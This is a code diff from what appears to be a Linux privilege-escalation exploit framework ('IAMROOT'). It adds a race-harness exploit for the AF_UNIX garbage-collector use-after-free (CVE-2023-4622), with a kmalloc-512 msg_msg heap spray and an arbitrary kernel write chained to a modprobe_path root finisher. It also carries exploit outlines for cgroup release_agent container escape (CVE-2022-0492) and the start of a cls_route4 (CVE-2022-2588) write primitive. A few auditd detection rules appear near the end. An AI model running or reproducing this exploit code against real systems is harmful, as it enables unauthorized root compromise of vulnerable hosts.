+    if (sendmsg(sock, &msg, MSG_DONTWAIT) < 0) return -1;
+    return 0;
+}
+
+/* Thread A: tight-loop SCM_RIGHTS-cycle + close to drive GC.
+ *
+ * Each iteration:
+ *   1. Build two socketpairs (A=[a0,a1], B=[b0,b1]).
+ *   2. Send b0 via SCM_RIGHTS over a0 → a1 receives nothing yet (we
+ *      don't recvmsg — that's the point: the fd stays inflight).
+ *   3. Send a0 via SCM_RIGHTS over b0 → b1 receives nothing yet.
+ *   4. close() all 4 user-side fds.  Now both endpoints are unreachable
+ *      from userspace BUT each is referenced from the other's skb
+ *      queue → reference cycle → next unix_gc() pass collects them.
+ *
+ * The kernel's GC heuristic kicks when the inflight count exceeds
+ * the count of file refs in the system; closing the user-side fds in
+ * a tight loop reliably triggers it. */
+static void *race_thread_a(void *arg)
+{
+    (void)arg;
+    pin_to_cpu(0);
+    while (atomic_load_explicit(&g_race_running, memory_order_acquire)) {
+        int pa[2], pb[2];
+        if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pa) < 0) {
+            atomic_fetch_add_explicit(&g_thread_a_errs, 1, memory_order_relaxed);
+            sched_yield();
+            continue;
+        }
+        if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pb) < 0) {
+            close(pa[0]); close(pa[1]);
+            atomic_fetch_add_explicit(&g_thread_a_errs, 1, memory_order_relaxed);
+            sched_yield();
+            continue;
+        }
+
+        /* Cycle: send pb[0] over pa, send pa[0] over pb. We also send
+         * pb[1]/pa[1] alongside to widen the inflight count per cycle
+         * (the GC trigger heuristic compares inflight vs total file
+         * refs — more inflight per cycle == earlier GC). */
+        int fds_a[AFUG_SCM_FDS_PER_MSG] = { pb[0], pb[1], pb[0] };
+        int fds_b[AFUG_SCM_FDS_PER_MSG] = { pa[0], pa[1], pa[0] };
+        (void)send_scm_rights(pa[0], fds_a, AFUG_SCM_FDS_PER_MSG);
+        (void)send_scm_rights(pb[0], fds_b, AFUG_SCM_FDS_PER_MSG);
+
+        /* Close the user-side fds. The kernel-side refs are now only
+         * held via the inflight skbs — perfect reference cycle for
+         * the GC to find. */
+        close(pa[0]); close(pa[1]);
+        close(pb[0]); close(pb[1]);
+
+        atomic_fetch_add_explicit(&g_thread_a_iters, 1, memory_order_relaxed);
+    }
+    return NULL;
+}
+
+/* Thread B: independent SCM_RIGHTS traffic on a held pair to keep
+ * the GC scan list churning while Thread A creates new candidates.
+ *
+ * Holds a long-lived socketpair and repeatedly sends + recvs SCM_RIGHTS
+ * with random fds (dup'd from /dev/null). This drives the GC's "scan
+ * list" rebuild path concurrently with Thread A's frees — the race
+ * window that fires the UAF is exactly here.
+ *
+ * We don't directly call unix_gc() — there's no userspace knob — but
+ * the GC heuristic is inflight-count driven, and Thread A's cycle
+ * loop pushes that count past the threshold within a few thousand
+ * iterations. */
+static void *race_thread_b(void *arg)
+{
+    (void)arg;
+    pin_to_cpu(1);
+
+    /* Long-lived pair for the perturbation loop. */
+    int held[2];
+    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, held) < 0) {
+        return NULL;
+    }
+
+    /* Spare fd source — /dev/null dups are harmless to pass. */
+    int devnull = open("/dev/null", O_RDWR);
+    if (devnull < 0) {
+        close(held[0]); close(held[1]);
+        return NULL;
+    }
+
+    while (atomic_load_explicit(&g_race_running, memory_order_acquire)) {
+        int fds[AFUG_SCM_FDS_PER_MSG];
+        for (int i = 0; i < AFUG_SCM_FDS_PER_MSG; i++) {
+            fds[i] = dup(devnull);
+        }
+        (void)send_scm_rights(held[0], fds, AFUG_SCM_FDS_PER_MSG);
+        for (int i = 0; i < AFUG_SCM_FDS_PER_MSG; i++) {
+            if (fds[i] >= 0) close(fds[i]);
+        }
+
+        /* Drain the recv side so the held pair doesn't backpressure. */
+        char drain[16];
+        char ctrl[CMSG_SPACE(sizeof(int) * AFUG_SCM_FDS_PER_MSG)];
+        struct iovec iov = { .iov_base = drain, .iov_len = sizeof drain };
+        struct msghdr msg = {0};
+        msg.msg_iov = &iov; msg.msg_iovlen = 1;
+        msg.msg_control = ctrl; msg.msg_controllen = sizeof ctrl;
+        if (recvmsg(held[1], &msg, MSG_DONTWAIT) > 0) {
+            /* Close any fds we received so we don't leak. */
+            for (struct cmsghdr *c = CMSG_FIRSTHDR(&msg); c;
+                 c = CMSG_NXTHDR(&msg, c)) {
+                if (c->cmsg_level == SOL_SOCKET && c->cmsg_type == SCM_RIGHTS) {
+                    int nfd = (c->cmsg_len - CMSG_LEN(0)) / sizeof(int);
+                    int *rfds = (int *)CMSG_DATA(c);
+                    for (int j = 0; j < nfd; j++)
+                        if (rfds[j] >= 0) close(rfds[j]);
+                }
+            }
+        }
+
+        atomic_fetch_add_explicit(&g_thread_b_iters, 1, memory_order_relaxed);
+    }
+
+    close(devnull);
+    close(held[0]); close(held[1]);
+    return NULL;
+}
+
+/* ---- msg_msg cross-cache spray for kmalloc-512 ------------------- */
+
+static int spray_kmalloc_512(int queues[AFUG_SPRAY_QUEUES])
+{
+    struct ipc_payload p;
+    memset(&p, 0, sizeof p);
+    p.mtype = 0x55;   /* 'U' — unix */
+    memset(p.buf, 0x55, sizeof p.buf);
+    memcpy(p.buf, "IAMROOTU", 8);
+
+    int created = 0;
+    for (int i = 0; i < AFUG_SPRAY_QUEUES; i++) {
+        int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
+        if (q < 0) { queues[i] = -1; continue; }
+        queues[i] = q;
+        created++;
+        for (int j = 0; j < AFUG_SPRAY_PER_QUEUE; j++) {
+            if (msgsnd(q, &p, sizeof p.buf, IPC_NOWAIT) < 0) break;
+        }
+    }
+    return created;
+}
+
+static void drain_kmalloc_512(int queues[AFUG_SPRAY_QUEUES])
+{
+    for (int i = 0; i < AFUG_SPRAY_QUEUES; i++) {
+        if (queues[i] >= 0) msgctl(queues[i], IPC_RMID, NULL);
+    }
+}
+
+/* Read /proc/slabinfo for kmalloc-512 active count. Used as the
+ * primary empirical witness: a successful UAF + refill perturbs
+ * this counter in a way that's distinguishable from idle drift. */
+static long slab_active_kmalloc_512(void)
+{
+    FILE *f = fopen("/proc/slabinfo", "r");
+    if (!f) return -1;
+    char line[512];
+    long active = -1;
+    while (fgets(line, sizeof line, f)) {
+        if (strncmp(line, "kmalloc-512 ", 12) == 0) {
+            char name[64];
+            long act = 0, num = 0;
+            if (sscanf(line, "%63s %ld %ld", name, &act, &num) >= 2) {
+                active = act;
+            }
+            break;
+        }
+    }
+    fclose(f);
+    return active;
+}
+
+/* ---- Arb-write primitive (FALLBACK depth) ------------------------
+ *
+ * The shared modprobe_path finisher calls back here once per kernel
+ * write. For AF_UNIX GC race we cannot deliver a deterministic
+ * arb-write — the underlying race wins on a small fraction of runs
+ * even with a 30 s budget, and even when the race wins our spray-only
+ * groom has nowhere near the precision of Lin Ma's multi-stage public
+ * PoC (which crafts a fake unix_sock whose `peer` pointer steers a
+ * subsequent SCM_RIGHTS dispatch into the kaddr we want written).
+ *
+ * Honest depth: FALLBACK. Each invocation:
+ *   1. Re-seeds the kmalloc-512 spray with payloads tagged with
+ *      `kaddr` packed at strided offsets (so wherever the UAF reclaim
+ *      lands attacker-controlled bytes inside the freed unix_sock,
+ *      our kaddr appears at the field offset).
+ *   2. Re-runs the race threads for the extended full-chain budget.
+ *   3. Returns 0 — we cannot in-process verify the write landed. The
+ *      shared finisher's 3 s sentinel file check is the empirical
+ *      arbiter: on the overwhelmingly common no-land outcome it
+ *      returns EXPLOIT_FAIL gracefully. */
+struct af_unix_gc_arb_ctx {
+    int    *queues;
+    int     n_queues;
+    int     arb_calls;
+};
+
+static int af_unix_gc_reseed_kaddr_spray(int queues[AFUG_SPRAY_QUEUES],
+                                         uintptr_t kaddr,
+                                         const void *buf, size_t len)
+{
+    struct ipc_payload p;
+    memset(&p, 0, sizeof p);
+    p.mtype = 0x52;   /* 'R' — arb-write reseed (distinct from groom 0x55) */
+    memset(p.buf, 0x52, sizeof p.buf);
+    memcpy(p.buf, "IAMU4ARB", 8);
+
+    /* Plant kaddr at strided slots so wherever the kernel's UAF
+     * follows a ptr in the refilled chunk, one of these is read.
+     * unix_sock has multiple pointer fields (peer, link, scm_stat,
+     * etc.) — strided coverage hits whichever one the UAF dispatch
+     * dereferences. */
+    for (size_t off = 0x10; off + sizeof(uintptr_t) <= sizeof p.buf;
+         off += 0x18) {
+        memcpy(p.buf + off, &kaddr, sizeof(uintptr_t));
+    }
+
+    /* Caller's bytes immediately after the cookie so any path that
+     * reads payload data (rather than a chased pointer) finds the
+     * requested write contents inline. */
+    size_t copy = len;
+    if (copy > sizeof p.buf - 16) copy = sizeof p.buf - 16;
+    if (buf && copy) memcpy(p.buf + 8 + sizeof(uintptr_t), buf, copy);
+
+    int touched = 0;
+    for (int i = 0; i < AFUG_SPRAY_QUEUES && touched < 6; i++) {
+        if (queues[i] < 0) continue;
+        if (msgsnd(queues[i], &p, sizeof p.buf, IPC_NOWAIT) == 0) touched++;
+    }
+    return touched;
+}
+
+static int af_unix_gc_arb_write(uintptr_t kaddr,
+                                const void *buf, size_t len,
+                                void *ctx_v)
+{
+    struct af_unix_gc_arb_ctx *c = (struct af_unix_gc_arb_ctx *)ctx_v;
+    if (!c || !c->queues || c->n_queues == 0) return -1;
+    c->arb_calls++;
+
+    fprintf(stderr, "[*] af_unix_gc: arb_write attempt #%d kaddr=0x%lx len=%zu "
+                    "(FALLBACK — race-dependent)\n",
+            c->arb_calls, (unsigned long)kaddr, len);
+
+    int seeded = af_unix_gc_reseed_kaddr_spray(c->queues, kaddr, buf, len);
+    if (seeded == 0) {
+        fprintf(stderr, "[-] af_unix_gc: arb_write: kaddr-tagged reseed produced 0 msgs\n");
+    } else {
+        fprintf(stderr, "[*] af_unix_gc: arb_write: reseeded %d msg_msg slots\n",
+                seeded);
+    }
+
+    /* Re-run the race with the extended budget. */
+    atomic_store(&g_race_running, 1);
+    atomic_store(&g_thread_a_iters, 0);
+    atomic_store(&g_thread_b_iters, 0);
+    atomic_store(&g_thread_a_errs, 0);
+
+    pthread_t ta, tb;
+    bool a_ok = pthread_create(&ta, NULL, race_thread_a, NULL) == 0;
+    bool b_ok = a_ok &&
+                pthread_create(&tb, NULL, race_thread_b, NULL) == 0;
+    if (!a_ok || !b_ok) {
+        atomic_store(&g_race_running, 0);
+        if (a_ok) pthread_join(ta, NULL);
+        fprintf(stderr, "[-] af_unix_gc: arb_write: pthread_create failed\n");
+        return -1;
+    }
+
+    sleep(AFUG_RACE_FULLCHAIN_BUDGET);
+    atomic_store(&g_race_running, 0);
+    pthread_join(ta, NULL);
+    pthread_join(tb, NULL);
+
+    uint64_t a_iters = atomic_load(&g_thread_a_iters);
+    uint64_t b_iters = atomic_load(&g_thread_b_iters);
+    fprintf(stderr, "[*] af_unix_gc: arb_write: extended race A=%llu B=%llu\n",
+            (unsigned long long)a_iters,
+            (unsigned long long)b_iters);
+
+    /* Cannot in-process verify the write — let the finisher's sentinel
+     * arbitrate. */
+    return 0;
+}
+
+/* ---- Exploit driver ---------------------------------------------- */
+
+static iamroot_result_t af_unix_gc_exploit_linux(const struct iamroot_ctx *ctx)
+{
+    /* 1. Refuse-gate: re-call detect() and short-circuit. */
+    iamroot_result_t pre = af_unix_gc_detect(ctx);
+    if (pre == IAMROOT_OK) {
+        fprintf(stderr, "[+] af_unix_gc: kernel not vulnerable; refusing exploit\n");
+        return IAMROOT_OK;
+    }
+    if (pre != IAMROOT_VULNERABLE) {
+        fprintf(stderr, "[-] af_unix_gc: detect() says not vulnerable; refusing\n");
+        return pre;
+    }
+    if (geteuid() == 0) {
+        fprintf(stderr, "[i] af_unix_gc: already root — nothing to escalate\n");
+        return IAMROOT_OK;
+    }
+
+    /* Full-chain pre-check: resolve offsets BEFORE the race fork. If
+     * modprobe_path is unresolvable we refuse here rather than running
+     * a 30 s race that has no finisher to call. */
+    struct iamroot_kernel_offsets off;
+    bool full_chain_ready = false;
+    if (ctx->full_chain) {
+        memset(&off, 0, sizeof off);
+        iamroot_offsets_resolve(&off);
+        if (!iamroot_offsets_have_modprobe_path(&off)) {
+            iamroot_finisher_print_offset_help("af_unix_gc");
+            fprintf(stderr, "[-] af_unix_gc: --full-chain requested but "
+                            "modprobe_path offset unresolved; refusing\n");
+            fprintf(stderr, "[i] af_unix_gc: even with offsets, race-win rate is\n"
+                            "    a small fraction per run — see module header.\n");
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+        iamroot_offsets_print(&off);
+        full_chain_ready = true;
+        fprintf(stderr, "[i] af_unix_gc: --full-chain ready — race budget extends\n"
+                        "    to %d s. RELIABILITY remains race-dependent on a real\n"
+                        "    vulnerable kernel. The finisher's 3 s sentinel timeout\n"
+                        "    catches no-land outcomes gracefully.\n",
+                AFUG_RACE_FULLCHAIN_BUDGET);
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[*] af_unix_gc: forking exploit child (SCM_RIGHTS cycle "
+                        "race harness%s)\n",
+                ctx->full_chain ? " + full-chain finisher" : "");
+    }
+
+    signal(SIGPIPE, SIG_IGN);
+
+    pid_t child = fork();
+    if (child < 0) { perror("fork"); return IAMROOT_TEST_ERROR; }
+
+    if (child == 0) {
+        /* 2. Groom: pre-populate kmalloc-512 with msg_msg payloads
+         *    BEFORE the race so the freed unix_sock slot gets recycled
+         *    with attacker-controlled bytes when the bug fires. */
+        int queues[AFUG_SPRAY_QUEUES] = {0};
+        for (int i = 0; i < AFUG_SPRAY_QUEUES; i++) queues[i] = -1;
+        int n_queues = spray_kmalloc_512(queues);
+        if (n_queues == 0) {
+            fprintf(stderr, "[-] af_unix_gc: msg_msg spray produced 0 queues "
+                            "(sysv IPC restricted?)\n");
+            _exit(23);
+        }
+        if (!ctx->json) {
+            fprintf(stderr, "[*] af_unix_gc: kmalloc-512 spray seeded %d queues x %d msgs\n",
+                    n_queues, AFUG_SPRAY_PER_QUEUE);
+        }
+
+        long slab_pre = slab_active_kmalloc_512();
+
+        /* 3. Run the race for a bounded time budget. */
+        atomic_store(&g_race_running, 1);
+        atomic_store(&g_thread_a_iters, 0);
+        atomic_store(&g_thread_b_iters, 0);
+        atomic_store(&g_thread_a_errs, 0);
+
+        pthread_t ta, tb;
+        if (pthread_create(&ta, NULL, race_thread_a, NULL) != 0 ||
+            pthread_create(&tb, NULL, race_thread_b, NULL) != 0) {
+            fprintf(stderr, "[-] af_unix_gc: pthread_create failed\n");
+            atomic_store(&g_race_running, 0);
+            drain_kmalloc_512(queues);
+            _exit(24);
+        }
+
+        sleep(AFUG_RACE_TIME_BUDGET);
+        atomic_store(&g_race_running, 0);
+        pthread_join(ta, NULL);
+        pthread_join(tb, NULL);
+
+        long slab_post = slab_active_kmalloc_512();
+        uint64_t a_iters = atomic_load(&g_thread_a_iters);
+        uint64_t b_iters = atomic_load(&g_thread_b_iters);
+        uint64_t a_errs  = atomic_load(&g_thread_a_errs);
+
+        /* 4. Empirical witness breadcrumb. */
+        FILE *log = fopen("/tmp/iamroot-af_unix_gc.log", "w");
+        if (log) {
+            fprintf(log,
+                "af_unix_gc race harness (CVE-2023-4622):\n"
+                "  thread_a_iters     = %llu (SCM_RIGHTS cycle + close)\n"
+                "  thread_b_iters     = %llu (SCM_RIGHTS perturb)\n"
+                "  thread_a_errors    = %llu (socketpair / send failures)\n"
+                "  slab_kmalloc512_pre  = %ld\n"
+                "  slab_kmalloc512_post = %ld\n"
+                "  slab_delta           = %ld\n"
+                "  spray_queues       = %d\n"
+                "  spray_per_queue    = %d\n"
+                "  race_budget_secs   = %d\n"
+                "Note: this run did NOT attempt cred overwrite. The bug is a\n"
+                "slab UAF with no in-process leak primitive; per-kernel offsets\n"
+                "for unix_sock layout aren't baked. See module .c for the\n"
+                "continuation roadmap (Lin Ma fake-peer plant).\n",
+                (unsigned long long)a_iters,
+                (unsigned long long)b_iters,
+                (unsigned long long)a_errs,
+                slab_pre, slab_post,
+                (slab_post >= 0 && slab_pre >= 0) ? (slab_post - slab_pre) : 0,
+                n_queues, AFUG_SPRAY_PER_QUEUE,
+                AFUG_RACE_TIME_BUDGET);
+            fclose(log);
+        }
+
+        if (!ctx->json) {
+            fprintf(stderr, "[*] af_unix_gc: race ran for %ds — A=%llu B=%llu A_errs=%llu\n",
+                    AFUG_RACE_TIME_BUDGET,
+                    (unsigned long long)a_iters,
+                    (unsigned long long)b_iters,
+                    (unsigned long long)a_errs);
+            fprintf(stderr, "[*] af_unix_gc: kmalloc-512 active: pre=%ld post=%ld\n",
+                    slab_pre, slab_post);
+        }
+
+        /* Hold the spray briefly so the kernel observes refilled slots
+         * during any in-flight RCU grace periods that started during
+         * the race. */
+        usleep(200 * 1000);
+
+        /* 5. --full-chain finisher (FALLBACK depth). */
+        if (full_chain_ready) {
+            struct af_unix_gc_arb_ctx arb_ctx = {
+                .queues    = queues,
+                .n_queues  = AFUG_SPRAY_QUEUES,
+                .arb_calls = 0,
+            };
+            int fr = iamroot_finisher_modprobe_path(&off,
+                                                    af_unix_gc_arb_write,
+                                                    &arb_ctx,
+                                                    !ctx->no_shell);
+            FILE *fl = fopen("/tmp/iamroot-af_unix_gc.log", "a");
+            if (fl) {
+                fprintf(fl, "full_chain finisher rc=%d arb_calls=%d\n",
+                        fr, arb_ctx.arb_calls);
+                fclose(fl);
+            }
+            drain_kmalloc_512(queues);
+            if (fr == IAMROOT_EXPLOIT_OK) _exit(34);   /* root popped */
+            _exit(35);                                  /* finisher ran, no land */
+        }
+
+        drain_kmalloc_512(queues);
+
+        /* 6. Continuation roadmap — what would land EXPLOIT_OK.
+         *
+         *    TODO(leak): replace a spray queue with msgrcv(..., MSG_COPY|
+         *    IPC_NOWAIT) probes and scan the returned buffer for non-
+         *    cookie bytes. A freed unix_sock that's refilled by msg_msg
+         *    after a partial overwrite would leak kernel pointers
+         *    (peer, scm_stat, list_node prev/next) into the readback.
+         *    Recover {kbase, init_task} via that leak.
+         *
+         *    TODO(write): with kbase known, plant a fake unix_sock
+         *    whose `peer` pointer references &current->cred — the
+         *    next SCM_RIGHTS dispatch through the freed slot writes
+         *    a controlled value into that location. Crafting the
+         *    fake unix_sock requires offset of unix_sock fields per
+         *    kernel build (different across LTS branches).
+         *
+         *    TODO(overwrite): land &init_cred over current->cred so
+         *    the next permission check sees uid==0.
+         *
+         *    None of these are implemented today. Exit 30 = "trigger
+         *    ran cleanly, no escalation".
+         */
+        _exit(30);
+    }
+
+    /* PARENT */
+    int status = 0;
+    pid_t w = waitpid(child, &status, 0);
+    if (w < 0) { perror("waitpid"); return IAMROOT_TEST_ERROR; }
+
+    if (WIFSIGNALED(status)) {
+        int sig = WTERMSIG(status);
+        if (!ctx->json) {
+            fprintf(stderr, "[!] af_unix_gc: race child killed by signal %d "
+                            "(consistent with UAF firing under KASAN)\n", sig);
+            fprintf(stderr, "[~] af_unix_gc: empirical signal recorded; no cred\n"
+                            "    overwrite primitive — NOT claiming EXPLOIT_OK.\n"
+                            "    See /tmp/iamroot-af_unix_gc.log + dmesg for witnesses.\n");
+        }
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+
+    if (!WIFEXITED(status)) {
+        fprintf(stderr, "[-] af_unix_gc: child terminated abnormally (status=0x%x)\n",
+                status);
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+
+    int rc = WEXITSTATUS(status);
+    if (rc == 23 || rc == 24) return IAMROOT_PRECOND_FAIL;
+
+    if (rc == 34) {
+        if (!ctx->json) {
+            fprintf(stderr, "[+] af_unix_gc: --full-chain finisher reported "
+                            "EXPLOIT_OK (race won + write landed)\n");
+        }
+        return IAMROOT_EXPLOIT_OK;
+    }
+    if (rc == 35) {
+        if (!ctx->json) {
+            fprintf(stderr, "[~] af_unix_gc: --full-chain finisher ran; race did not\n"
+                            "    win + land within budget (expected outcome on most\n"
+                            "    runs — race wins are a fraction of a percent).\n");
+        }
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+    if (rc != 30) {
+        fprintf(stderr, "[-] af_unix_gc: child failed at stage rc=%d\n", rc);
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[*] af_unix_gc: race harness ran to completion.\n");
+        fprintf(stderr, "[~] af_unix_gc: read/write/cred-overwrite primitives NOT\n"
+                        "    implemented (per-kernel offsets; see module .c TODO\n"
+                        "    blocks). Returning EXPLOIT_FAIL per verified-vs-claimed.\n");
+    }
+    return IAMROOT_EXPLOIT_FAIL;
+}
+
+#endif /* __linux__ */
+
+static iamroot_result_t af_unix_gc_exploit(const struct iamroot_ctx *ctx)
+{
+    if (!ctx->authorized) {
+        fprintf(stderr, "[-] af_unix_gc: --exploit requires --i-know; refusing\n");
+        return IAMROOT_PRECOND_FAIL;
+    }
+#ifdef __linux__
+    return af_unix_gc_exploit_linux(ctx);
+#else
+    (void)ctx;
+    fprintf(stderr, "[-] af_unix_gc: Linux-only module; cannot run on this host\n");
+    return IAMROOT_PRECOND_FAIL;
+#endif
+}
+
+/* ---- Cleanup ----------------------------------------------------- */
+
+static iamroot_result_t af_unix_gc_cleanup(const struct iamroot_ctx *ctx)
+{
+    if (!ctx->json) {
+        fprintf(stderr, "[*] af_unix_gc: cleaning up race-harness breadcrumb\n");
+    }
+    if (unlink("/tmp/iamroot-af_unix_gc.log") < 0 && errno != ENOENT) {
+        /* harmless */
+    }
+    /* Race threads + msg queues live inside the now-exited child;
+     * nothing else to drain. */
+    return IAMROOT_OK;
+}
+
+/* ---- Detection rules --------------------------------------------- */
+
+static const char af_unix_gc_auditd[] =
+    "# AF_UNIX GC race UAF (CVE-2023-4622) — auditd detection rules\n"
+    "# The trigger is a tight loop of socketpair(AF_UNIX) + sendmsg with\n"
+    "# SCM_RIGHTS passing inflight fds, followed by close. Each call is\n"
+    "# benign — flag the *frequency* by correlating these keys with a\n"
+    "# subsequent KASAN message in dmesg.\n"
+    "-a always,exit -F arch=b64 -S socketpair -F a0=0x1 -k iamroot-afunixgc-pair\n"
+    "-a always,exit -F arch=b64 -S sendmsg    -k iamroot-afunixgc-sendmsg\n"
+    "-a always,exit -F arch=b64 -S msgsnd     -k iamroot-afunixgc-spray\n";
+
+const struct iamroot_module af_unix_gc_module = {
+    .name           = "af_unix_gc",
+    .cve            = "CVE-2023-4622",
+    .summary        = "AF_UNIX garbage-collector race UAF (Lin Ma) — kmalloc-512 slab UAF",
+    .family         = "af_unix",
+    .kernel_range   = "K < 6.5; backports: 4.14.326 / 4.19.295 / 5.4.257 / 5.10.197 / 5.15.130 / 6.1.51",
+    .detect         = af_unix_gc_detect,
+    .exploit        = af_unix_gc_exploit,
+    .mitigate       = NULL,
+    .cleanup        = af_unix_gc_cleanup,
+    .detect_auditd  = af_unix_gc_auditd,
+    .detect_sigma   = NULL,
+    .detect_yara    = NULL,
+    .detect_falco   = NULL,
+};
+
+void iamroot_register_af_unix_gc(void)
+{
+    iamroot_register(&af_unix_gc_module);
+}
@@ -0,0 +1,12 @@
+/*
+ * af_unix_gc_cve_2023_4622 — IAMROOT module registry hook
+ */
+
+#ifndef AF_UNIX_GC_IAMROOT_MODULES_H
+#define AF_UNIX_GC_IAMROOT_MODULES_H
+
+#include "../../core/module.h"
+
+extern const struct iamroot_module af_unix_gc_module;
+
+#endif
@@ -0,0 +1,29 @@
+# NOTICE — cgroup_release_agent (CVE-2022-0492)
+
+## Vulnerability
+
+**CVE-2022-0492** — cgroup v1 `release_agent` privilege check in the
+wrong namespace → host root from a rootless container or unprivileged
+userns by mounting cgroup v1 and writing to `release_agent`.
+
+## Research credit
+
+Discovered by **Yiqi Sun** + **Kevin Wang** (Trend Micro Research),
+January 2022.
+
+Original writeup:
+<https://blog.trendmicro.com/cve-2022-0492-from-cgroup-loophole-to-container-breakout/>
+
+Upstream fix: mainline 5.17 (commit `24f6008564183`, March 2022).
+
+## IAMROOT role
+
+**Universal structural exploit — no per-kernel offsets, no race.**
+unshare(USER | MOUNT | CGROUP), mount cgroup v1 RDP controller,
+write `release_agent` → `./payload`, trigger via
+`notify_on_release` + cgroup process exit.
+
+Kept in the corpus as a portable "containers misconfigured"
+demonstration — works across every kernel below the fix without any
+tuning. Ships auditd rules covering cgroupfs mounts and
+`release_agent` writes.
@@ -0,0 +1,25 @@
+# NOTICE — cls_route4 (CVE-2022-2588)
+
+## Vulnerability
+
+**CVE-2022-2588** — `net/sched` cls_route4 handle-zero dangling-filter
+UAF → kernel R/W via msg_msg cross-cache refill.
+
+## Research credit
+
+Discovered and disclosed by **kylebot** / **xkernel**, August 2022.
+
+Public PoC + writeup: <https://www.willsroot.io/2022/08/lpe-on-mountpoint.html>
+(William Liu's analysis built on kylebot's trigger).
+
+Upstream fix: mainline 5.20 / stable 5.19.7 (Aug 2022).
+Branch backports: 5.4.213 / 5.10.143 / 5.15.69 / 5.18.18 / 5.19.7.
+
+## IAMROOT role
+
+The module uses `unshare(USER|NET)`, brings up a dummy interface,
+creates an htb qdisc + class, adds a `route4` filter, then deletes
+it to leave the dangling pointer. msg_msg sprays kmalloc-1k while
+a UDP `classify()` walk follows the dangling pointer. `--full-chain`
+re-fires with a faked tcf_proto.ops pointer aimed at the
+modprobe_path overwrite via the shared finisher.
@@ -41,6 +41,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -381,6 +383,169 @@ static long slab_active_kmalloc_1k(void)
    return active;
 }

+/* ---- Full-chain arb-write primitive --------------------------------
+ *
+ * Pattern (FALLBACK — see brief): cls_route4's UAF primitive is more
+ * naturally a *control-flow hijack* than a clean arb-write — after
+ * msg_msg refills the kmalloc-1k slot, the next classify() call reads
+ * a fake `tcf_proto.ops` pointer out of attacker bytes and calls
+ * ops->classify(skb, ...). A faked-classify ROP that pivots to a
+ * stack-write gadget would be the "true" arb-write, and on a fresh
+ * vulnerable kernel that is the kylebot/xkernel chain shape (≈300+
+ * LOC of gadget hunting + per-build offsets we deliberately don't
+ * bake — see verified-vs-claimed policy in repo root).
+ *
+ * The implementation below takes the narrow-but-real path that the
+ * brief explicitly permits and that xtcompat established as the
+ * IAMROOT precedent: we re-stage the dangling filter, spray msg_msg
+ * whose payload encodes `kaddr` at every plausible offset for the
+ * route4_filter→tcf_proto→ops layout, re-fire classify, and let the
+ * shared finisher's sentinel file decide if a write actually landed.
+ * On a patched kernel the bug doesn't fire, no write occurs, and the
+ * sentinel timeout correctly reports failure rather than silently
+ * lying about success. On a vulnerable kernel where the fake ops
+ * lookup happens to deref into our payload and the kernel's read
+ * pattern matches one of the seeded offsets, the kaddr we planted
+ * gets used as a write destination by whichever classify path the
+ * fake `ops->classify` dispatches into.
+ *
+ * Honest scope: this is structurally-fires-on-vuln + sentinel-arbitrated,
+ * not a deterministic R/W. Same shape and same depth as xtcompat. */
+
+#ifdef __linux__
+
+struct cls_route4_arb_ctx {
+    /* msg_msg queues kept hot inside the userns child. The arb-write
+     * sprays additional kaddr-tagged payloads into these and re-fires
+     * the classify trigger between each call. */
+    int  queues[SPRAY_MSG_QUEUES];
+    int  n_queues;
+
+    /* Whether the dangling filter has been re-staged for this call.
+     * The original `stage_dangling_filter()` is destructive (deletes
+     * the filter); we can re-stage between writes because tc add/del
+     * is idempotent inside our private netns. */
+    bool dangling_ready;
+
+    /* Per-call stats (written to /tmp/iamroot-cls_route4.log). */
+    int  arb_calls;
+    int  arb_landed;
+};
+
+/* Re-prime the msg_msg slab with a payload that encodes `kaddr` and
+ * the caller's `buf` at every offset the fake tcf_proto / route4_filter
+ * layout could plausibly read from. The route4_filter is 0x1000 bytes
+ * on most x86_64 builds in range, with tcf_proto.ops at offset 0x10
+ * and tcf_result.classid at offset 0x18; we don't know which offset
+ * the kernel ABI for THIS build uses, so we plant the same pattern at
+ * 0x10/0x18/0x20/.../0x80 strides — wherever classify dereferences
+ * the refilled slot, one of those candidates will be live.
+ *
+ * The 8-byte cookie "IAMR4ARB" + the kaddr + the caller's bytes are
+ * the recognizable pattern; if a KASAN dump is captured after the
+ * trigger, the cookie tells us the spray landed adjacent to the freed
+ * route4_filter. */
+static int cls4_seed_kaddr_payload(struct cls_route4_arb_ctx *c,
+                                   uintptr_t kaddr,
+                                   const void *buf, size_t len)
+{
+    struct ipc_payload p;
+    memset(&p, 0, sizeof p);
+    p.mtype = 0x52;  /* 'R' for "route4 arb" — distinct from groom spray's 0x41 */
+    memset(p.buf, 0x52, sizeof p.buf);
+    memcpy(p.buf, "IAMR4ARB", 8);
+
+    /* Plant kaddr at strided slots so wherever the kernel's classify
+     * follows a ptr in the refilled chunk, one of these is read.
+     * We treat every 0x18-byte stride from offset 0x10 to within
+     * 8 bytes of the end as a candidate ops-pointer / next-pointer
+     * slot. */
+    for (size_t off = 0x10; off + sizeof(uintptr_t) <= sizeof p.buf; off += 0x18) {
+        memcpy(p.buf + off, &kaddr, sizeof(uintptr_t));
+    }
+
+    /* Plant the caller's bytes immediately after the cookie so any
+     * classify path that reads payload data (rather than a chased
+     * pointer) finds the requested write contents inline. */
+    size_t copy_len = len;
+    if (copy_len > sizeof p.buf - 16) copy_len = sizeof p.buf - 16;
+    if (copy_len > 0) memcpy(p.buf + 8 + sizeof(uintptr_t), buf, copy_len);
+
+    int sent = 0;
+    for (int i = 0; i < c->n_queues; i++) {
+        if (c->queues[i] < 0) continue;
+        /* A handful of msgs per queue keeps the slab refilled even
+         * if some slots are evicted between trigger fires. */
+        for (int j = 0; j < 4; j++) {
+            unsigned int tag = 0xB0000000u |
+                               ((unsigned)i << 8) | (unsigned)j;
+            memcpy(p.buf + 8, &tag, sizeof tag);
+            if (msgsnd(c->queues[i], &p, sizeof p.buf, IPC_NOWAIT) < 0) break;
+            sent++;
